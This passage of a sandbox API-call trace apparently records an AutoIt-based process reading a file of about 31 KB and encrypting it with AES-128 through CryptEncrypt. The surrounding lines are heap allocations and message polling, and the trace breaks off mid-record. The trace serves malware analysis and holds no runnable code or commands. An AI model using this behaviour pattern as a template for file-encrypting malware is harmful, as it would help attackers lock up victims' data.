[0162.048] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.048] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.048] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0162.048] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x7a52, lpOverlapped=0x0) returned 1 [0162.051] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0162.052] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0162.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0162.052] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0162.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0162.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0162.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7a52) returned 0x9e5190 [0162.053] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0162.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0162.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0162.053] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0162.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0162.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.053] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0162.053] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0162.053] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0162.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0162.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0162.054] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0162.054] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0162.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0162.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0162.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0162.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0162.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0162.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0162.054] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0162.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0162.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0162.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0162.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0162.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0162.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0162.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0162.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0162.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0162.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0162.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0162.055] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0162.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0162.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0162.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0162.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0162.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0162.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0162.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0162.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0162.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0162.055] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0162.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0162.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0162.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0162.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0162.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0162.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0162.055] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.055] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0162.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0162.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0162.055] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0162.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0162.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0162.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0162.056] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c26e8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c26e8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0162.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0162.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0162.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0162.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0162.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0162.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0162.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0162.056] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0162.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0162.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0162.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0162.056] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0162.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0162.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0162.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0162.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0162.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4c0 [0162.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0162.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0162.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0162.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0162.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0162.057] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0162.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0162.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0162.057] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0162.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0162.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0162.057] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.057] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.057] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0162.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0162.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0162.057] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0162.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0162.057] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0162.057] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0162.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0162.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.058] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0162.058] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0162.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0162.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0162.058] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.058] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0162.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.058] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0162.058] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0162.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0162.058] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0162.058] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0162.058] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0162.058] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0162.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0162.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0162.059] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.059] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0162.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0162.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0162.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0162.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0162.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.059] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.059] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0162.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0162.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0162.059] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0162.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0162.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0162.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0162.059] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x7a52, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x7a60) returned 1 [0162.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0162.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0162.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0162.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0162.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0162.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0162.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0162.060] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0162.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0162.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0162.060] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.060] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0162.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0162.060] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0162.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0162.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0162.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0162.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0162.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0162.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0162.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0162.061] CharLowerBuffW (in: lpsz="byte[31329]", cchLength=0xb | out: lpsz="byte[31329]") returned 0xb [0162.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0162.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0162.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0162.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0162.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0162.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0162.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0162.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0162.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0162.069] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0162.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0162.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0162.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0162.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0162.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0162.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0162.069] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.069] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0162.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0162.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0162.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0162.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0162.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.070] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.070] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0162.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0162.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0162.070] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0162.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0162.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0162.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0162.070] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9fc0b0*, pdwDataLen=0x87e820*=0x7a52, dwBufLen=0x7a60 | out: pbData=0x9fc0b0*, pdwDataLen=0x87e820*=0x7a60) returned 1 [0162.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0162.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0162.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0162.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0162.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0162.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0162.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0162.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.071] RtlAllocateHeap 